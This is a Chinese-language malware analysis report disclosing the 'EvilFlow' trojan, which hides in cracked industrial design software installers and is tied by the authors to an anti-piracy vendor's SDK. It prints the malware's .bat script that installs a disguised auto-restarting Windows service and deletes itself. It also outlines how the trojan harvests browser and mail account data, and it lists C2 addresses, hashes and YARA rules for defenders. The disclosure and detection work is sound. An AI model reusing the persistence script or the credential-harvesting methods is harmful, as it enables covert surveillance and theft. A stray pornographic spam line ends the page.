<p id="p5rvh"></p>

      惡流涌動: 披露來自反盜版公司的釣魚行動

      2021-08-03 來源:安全豹作者:安全豹

      一、事件概述

              近期,金山毒霸“捕風”威脅感知系統監控到一批潛伏已久的竊密木馬活動痕跡,該木馬家族通過偽裝系統服務實現持久化駐留,并持續監控收集操作系統、硬件信息、軟件列表、WIFI熱點、網絡架構、瀏覽器賬號以及郵件列表等敏感信息。該家族早期版本可以追溯到2019年底,并在近2年期間持續變種保持活躍,從安全對抗、信息竊取、代碼框架等方面都表現出較高的專業性。

              通過數據溯源,我們發現該家族的傳播源表現出明顯聚合性,主要通過篡改知名工業設計軟件的破解安裝包、捆綁注冊機等方式植入初始感染文件,涉及廠商和軟件包括:CATIA(法國Dassault System)、VCS(美國Synopsys) 、ANSYS(美國Ansys)等。上述廠商均為全球知名工業設計軟件供應商,在CAD/CAE/EDA等高端軟件領域處于壟斷巨頭地位,旗下軟件在航空航天、國防軍工、石油化工、土木建筑、電子芯片、生物醫學等幾乎所有工業領域被廣泛應用。

      樣本具體信息

              我們最初認為這可能是一起通過軟件供應鏈污染方式,針對工業領域目標群體的釣魚竊密攻擊。但是隨著對樣本同源性的進一步深入分析,發現該攻擊事件的幕后謀劃目的并不簡單。通過字符串、通訊CC和代碼特征等多維關聯分析,我們發現其與美國Cylynt公司的反盜版解決方案產品SmartFlow存在極高關聯性和代碼相似度。該產品于2014年對外發布,主要以SDK方式集成到被保護軟件,通過采集并分析軟件使用者的系統信息、操作數據實現對應用破解、盜版許可的監控追蹤,最終協助客戶通過法律訴訟等方式實現正版用戶轉化。

      產品對比

              如上圖所示,通過相似代碼特征分析,在濾波器設計軟件Filter Solutions、數字濾鏡軟件Tiffen Dfx、3D建模設計工具SketchUp等多款工業設計軟件中,我們均發現SmartFlow反盜版方案SDK的嵌入。但與這些通過用戶協議授權的軟件功能不同,本次捕獲的變種樣本存在非常明顯的木馬病毒化傾向。無論是網盤傳播渠道的釣魚傳播方式,還是偽裝正常系統服務實現持久化駐留,再到竊取用戶隱私的定制化技術方案,甚至為了規避安全廠商檢測查殺的代碼加密保護,以上都表明本次釣魚事件和相關樣本行為已經嚴重超出安全底線。

      定制化區別

              另外,從SmartFlow的官方主頁[1]介紹我們可以了解到,該產品從2020年6月開始升級為Cylynt智能流合規解決方案,通過提供整合包括遙測數據和企業內部數據集等多個信息源,實現更廣泛的軟件即服務(SaaS)盜版市場情報平臺,在時間線上和該家族的傳播活躍軌跡基本吻合。從創始人Ted Miracco的采訪新聞中也可以看到,針對國內某大型電子公司的反盜版訴訟是其首個成功案例[2],亞太地區尤其是中國一直是該公司的重點情報收集地區[3],從我們捕獲的中文破解版誘餌安裝包也可以側面佐證這一推斷。除此之外,我們通過Virustotal等安全平臺的樣本數據分析,在全球多個地區均發現該家族活動痕跡。

      關鍵網頁內容截圖

              綜上所述,我們可以初步判定本次攻擊事件是一起由反盜版軟件公司幕后組織發起的,針對全球工業設計軟件盜版使用組織的釣魚狩獵行動,目的在于通過木馬技術手段長期監控收集用戶敏感信息,轉化為產品情報數據用于服務自身客戶。

              “與惡龍纏斗過久,自身亦成為惡龍”,所以本次釣魚攻擊事件被毒霸安全團隊命名為"惡流行動-EvilFlow"。作為一家軟件公司,我們強烈認可并踐行反盜版軟件的價值理念,但另一方面,所謂正義目的不應該成為非法竊密行為的偽裝外衣,作為一家安全公司,我們需要負責任地對非法竊取用戶敏感數據的行為進行公開披露。


      二、行為分析

              我們對捕捉到的3類樣本進行分析對比,發現CATIA、VCS和ANSYS在目標用戶的計算機中安裝木馬的手法一致,都是偽裝成正常的系統服務,區別在于CATIA和ANSYS是通過替換破解安裝包的文件嵌入木馬程序,而VCS是通過捆綁注冊機實現。首次發現案例來源于CATIA的中文破解版安裝包,接下來以CATIA為代表闡述此次木馬樣本行為,具體流程如下圖所示:

      樣本流程v1

              當目標用戶下載安裝盜版軟件時,安裝包會釋放程序進行服務的注冊和啟動,通過內存解密加載PrsCore.dll實現隱私數據的收集,并將數據信息格式化后上傳至云端。

      (一)CATIA

              CATIA是全球領先的商業三維CAD設計軟件。我們從“捕風”系統捕獲的日志可知該用戶下載“CATIA”的中文破解版安裝包的渠道是百度網盤,其中安裝包內的DSYAdmVC11preqInstaller.exe和DSYAdmVC11preq.exe文件被替換,DSYAdmVC11preq.exe會在系統中備份和啟動DSYAdmVC11preqInstaller.exe程序。

      CATIA

              在樣本啟動后釋放了5個子文件,其中csns.rc和兩個.exe文件是通過樣本攜帶的資源釋放,兩個.bat文件由加密字符串解密后寫入文件。釋放文件具體信息如以下表格所示:

      釋放文件信息

      1. 偽裝系統服務持久化:.bat腳本

              文件名稱隨機生成,作用是通過命令行操作啟動指定服務。內容來源是DSYAdmVC11preqInstaller程序,其中兩個服務名稱和描述都偽裝成系統正常的服務內容。啟動Network Connection Checker服務的腳本具體內容如以下文本所示,啟動Service Counter Virtual DLL服務的腳本與此.bat文件內的處理流程基本一致。

      ::創建一個指定路徑下的每次重新啟動計算機時自動啟動的窗口服務
      sc create "Network Connection Checker" 
      binPath= "C:\Windows\Temp\A3fjRGPfH8s4fJUiJJWJ\UU6zeVA9g912SX2XpzzV\n01ivrQBdyGo_rCXR_9d\Network Connection Checker.exe" 
      DisplayName= "Network Connection Checker" start= auto
      ::超出86400s則服務失敗,執行兩次重啟和一次執行操作
      sc failure "Network Connection Checker" reset=86400 actions=restart/1000/restart/1000/run/1000
      ::設置服務的描述字符串
      ::網絡連接檢查器:檢查允許 Windows 應用商店應用程序從 Internet 接收通知的連接。
      sc description "Network Connection Checker" 
      "Check connections that allow Windows Store Apps to receive notifications from the internet." 
      :: 啟動服務
      sc start "Network Connection Checker"
      ::刪除當前腳本
      del C:\Windows\Temp\A3fjRGPfH8s4fJUiJJWJ\UU6zeVA9g912SX2XpzzV\n01ivrQBdyGo_rCXR_9d\{6C0B1108-F1E8-4EAE-8612-EAFC9E210285}.bat

      2. 后門服務一:Service Counter Virtual DLL.exe

              服務程序由.bat文件創建并啟動,在ServiceMain函數中執行了對csns.rc文件的解密操作,解密后為動態鏈接庫PrsCore.dll,其后對此模塊進行內存加載并獲取導出信息收集相關功能函數供服務程序調用。資源文件解密和加載操作的部分代碼實現如下圖所示:

      內存解密和加載

      3. 竊密DLL:PrsCore.dll

      此動態鏈接庫一共導出以下4個函數,以下介紹函數的主要行為:

      (1)ServiceMain_Run_Before和ServiceMain_Run_After

              - ServiceMain_Run_Before根據參數決定是服務報告還是服務監控行為,并且進行服務的初始化操作;

              - ServiceMain_Run_After服務數據的清理及內存釋放工作。

      (2)ServiceOSCommunication_ReportStop

              - 執行進程結束之前的清理工作;

              - 創建網絡通訊的線程發送協議停止進程。

      (3)ServiceMain_ThreadRun

              - 通過不斷打開服務進行服務自身持久化的檢查,實現長期隱蔽地采集目標用戶信息;

              - 獲取用目標用戶的數據,包含時間信息、WIFI信息、系統信息、網絡信息、庫信息、郵件信息以及網絡掃描器信息;

                以下表格展示了監控目標用戶的信息匯總和內存截圖:

      GetUserInfo

                以下說明郵件信息的獲取方式:

                    a. Outlook:根據不同版本從注冊表對應路徑定位配置相關信息,通過枚舉子項獲取到郵件的用戶賬戶名稱。

                    b. Chrome:從Chrome自動填充表單中獲取項,通過文件路徑讀取數據庫文件Login Data的數據來獲取用戶賬號名稱。

                    c. IE:讀取IE的表單歷史記錄,使用vaultcli.dll庫(Windows保險庫)枚舉項目獲取用戶賬號名稱和URL。

                    d. Firefox:讀取Firefox的表單歷史記錄,通過文件路徑定位配置文件夾的signons.sqlite文件,

                                      再使用nss3.dll密碼庫獲取解密后的用戶賬戶名稱和URL。

              - 與IP:54.225.164.82進行網絡通信,此IP是在線托管SmartFlow Professional的亞馬遜網絡服務 (AWS) ,

                 服務名為PHDLServer;

              - 通過校驗破解文件的Hash值檢查產品是否遭到篡改、破解;

                下圖描述了樣本對破解文件的校驗代碼以及破解文件名稱與SHA512的對應關系:

      CheckFile        - 收集運行環境信息,將請求的所有數據信息格式化并發送至服務器端,進行數據的采集與上報。

                 服務端IP為54.225.164.82,此IP與正常內嵌Smartflow的產品共用。

      網絡通訊

      4. 后門服務二:Network Connection Checker.exe

              此程序的邏輯與Service Counter Virtual DLL.exe基本一致但是體積具有較大差異,通過查看發現資源內部藏匿了一個PE文件”NetworkScanner“,此文件的作用是網絡掃描器。執行NetworkScanner.exe時會釋放兩個文件,其中.test文件內容是竊取目標用戶的網絡數據,包含IP地址、主機名以及MAC地址,.dat文件是其加密格式。主要行為如圖所示:

      資源PE文件

              網絡掃描器的資源中還內嵌了一份MAC地址和設備生產廠商名映射數據,未發現直接引用,推測被用于內網接入設備的掃描探測和識別信息收集。

      Company

      (二)Synopsys VCS

              Synopsys 是電子設計自動化軟件工具的主導企業,致力于復雜的芯片上系統(SoCs)的開發,VCS 是業內最高性能的仿真引擎、約束條件解算器引擎。通過樣本溯源發現,與其他直接篡改破解安裝包的植入方式不同,針對VCS的攻擊誘餌,是通過在其外部廣為流傳的注冊機程序scl_keygen.exe中捆綁后門實現。

      Synopsys注冊機信息

              此樣本將服務名偽裝成智能卡緩存(Smart Card Cache)和系統代理(System Broker),描述分別為“Enables data caching for smart card readers.”和“Monitors execution of background processes and coordinates their work.”,實際功能與CATIA樣本的兩個服務一致。其釋放的smsp.imp在內存解密裝載后是PrsCore.dll。此樣本中服務端IP是54.87.181.244,如下圖所示,其關聯域名大多偽裝成升級檢查或者數據服務等類型。

      Synopsys

      (三)Ansys

              美國ANSYS公司的大型通用有限元分析軟件,在全球眾多行業中被工程師和設計師廣泛采用,是現代產品設計中的高級計算機輔助工程工具之一。通過日志我們可以發現安裝包內篡改了AnsConfigCommonInstaller.exe和AnsConfigCommon.exe兩個文件,在運行時同樣創建了兩個服務,如下圖所示:

      ANSYS        此樣本同樣將服務名進行了偽裝,一個名稱是Windows錯誤檢查器(Windows Error Checker.exe),描述服務的字符串是“Allows checking for errors when programs no longer work properly.”,另一個名稱是虛擬音頻服務(Virtual Audio Service.exe),描述服務的字符串是“Provides management services for mixed reality audio simulation.”,imp.csnj為PrsCore.dll的加密文件。釋放文件的具體信息在以下表格列出:

      ANSYS釋放文件此樣本中服務端的IP為54.225.164.82,仍是和正常軟件的服務端復用,與CATIA樣本一致。


      三、結論

              盜版軟件歷來是病毒木馬傳播的溫床,前段時間毒霸安全團隊剛剛披露過國外黑客組織偽造破解軟件下載站群大肆傳播STOP勒索病毒[4],從這些安全事件可以看出,緊盯著盜版軟件的不僅僅是黑客組織,還有反盜版軟件公司和軟件廠商。用戶使用破解版軟件的行為,不僅對于正規軟件廠商利益是一種巨大損害,于己而言更存在巨大的網絡安全風險和法律風險。

              當前軟件安全問題影響已經廣泛地滲透到我國基礎互聯網的各個領域,工業網絡安全更是國家網絡安全的重中之重,我們呼吁國內工業領域相關廠商參照本文公開披露的IOC信息應進行積極自查,避免內部破解軟件意外使用帶來的敏感信息泄露和法律訴訟風險。


      IoCs(部分)

      MD5

      7c43585653f4166836016d36dc68288b 

      d93b369071ea0e9657c9bed68431ab61

      4fd9a93cc45d31f786970d37f3fea54d

      b36b0f672e52eb1d7f6cf55384f338ec

      b1ae71f946adf1eb2e757366d729e880

      f1e1eba3ccb167b8fd049b939d54c609 

      b7a579d2dd685485718cbfa0b0f8ea3e

      c94dda6cf976ac83bc59753b78fac573

      2ab727e50e89976c44452b8270b29496

      3f99f76ca1cb4c998c8c4ccc9ca0e3c0

      27fc98cc8f319c04ea2b909fe06d31c8

      3680cd403620901fad99e813cdf3aed7

      036048692942635706c424a4912be1f9

      1f5152b3d4168b7335f949abc7bb08c4

      2c895039f3992d6779e4b681493a6923

      3fd894b1deb1fb4344f080e001b4232e

      1c4ab48dd313e1725cf68f3e5b11d7b1

      2a82b71512182d224feeb78d14c79483

      8b0442c32a4949527c25699b3b8dfdf8

      41f46d5f2b334d0bb579943bc90f0108

      436c7e268b030295199d73084b5cc8f0

      26835aa6c68d5bd7c601ab442c72742b

      dbd526d46a9f45160d99081fd509288a

      e3ea84b47bbc5e052bda82645fc2998b

      YARA規則

      rule EvilFlowServices
      {
          meta:
              description = "Malicious service of EvilFlow"
              author = "kingsoft internet security"
              date = "2021-08-02"
              hash = "4fd9a93cc45d31f786970d37f3fea54d|b36b0f672e52eb1d7f6cf55384f338ec"
          strings:
              $func1_string = "ServiceMain_Run_Before" fullword
              $func2_string = "ServiceMain_Run_After" fullword
              $func3_string = "ServiceMain_ThreadRun" fullword
              $func4_string = "ServiceOSCommunication_ReportStop" fullword
              $ServiceMonitoring_string = "tcmztd2M+HkXkBy/cTZMDDJCn7mn6gKquZtXf+n9HNQ2Oc8TTnaMwU6GNcZylTKb" fullword
              $console_string = "dSkS+FFYfBI/H7vjZxLcz4oWbsZYUC56v2l7njhMdJA=" fullword
          condition:
              uint16(0) == 0x5a4d and 4 of them
      }
      
      rule EvilFlowInstaller
      {
          meta:
              description = "Malicious installer of EvilFlow"
              author = "kingsoft internet security"
              date = "2021-08-02"
              hash = "7c43585653f4166836016d36dc68288b|b1ae71f946adf1eb2e757366d729e880"
          strings:
              $systemdrive_string = "HKT4aEPcgXRo0rXdX5WvX/1ziRQ/089COUMIJ2P4K0c=" fullword
              $Executable_string  = "asC+MzzZB97r/E42lxjXQyU9nBQ3Z3Rt74eSK4m6VJ4=" fullword
              $WindowsTemp_string = "nhQ+Tepq0xFYL5i/kvI2c5vShwh1PxgIjwikT3XAXfU=" fullword
          condition:
              uint16(0) == 0x5a4d and 3 of them
      }

      C&C (IP)

      54.225.164.82 (此IP與內嵌smartflow的正常軟件復用)

      54.87.181.244

      100.24.182.26

      C&C(URL)

      http://data-msversion.net/Update/gls

      http://winimgserv.com/Update/cnv

      http://asmstatic-channel.com/Update/cnvd

      http://asmstatic-channel.com/Update/upd

      http://asmstatic-channel.com/Update/cnv

      http://asmstatic-channel.com/Update/gls

      http://winimgserv.com/Update/cnvd

      http://asmstatic-channel.com/Update/scc




      [1] SmartFlow Compliance Solutions Becomes Cylynt, Leverages (globenewswire.com):https://www.globenewswire.com/en/news-release/2020/06/01/2041261/0/en/SmartFlow-Compliance-Solutions-Becomes-Cylynt-Leverages-Anti-Piracy-Expertise-to-Expand-into-Usage-Analytics-and-Software-Monetization.html

      [2] Ted Miracco of Cylynt: 5 Things You Need To Know To Tighten Up Your Company’s Approach to Data Privacy and Cybersecurity | by Jason Remillard | Authority Magazine | Medium:https://medium.com/authority-magazine/ted-miracco-of-cylynt-5-things-you-need-to-know-to-tighten-up-your-companys-approach-to-data-4c6275c940b6

      [3] SmartFlow Compliance Solutions: Taking the offensive on Software (edacafe.com):https://www10.edacafe.com/blogs/ipshowcase/?p=1719

      [4]"毒群"家族:勒索、竊密組團來襲 (ijinshan.com):http://www.indtools.net/info/202107121420.shtml


      ? 中国少妇嫖妓BBWBBW

          <p id="p5rvh"></p>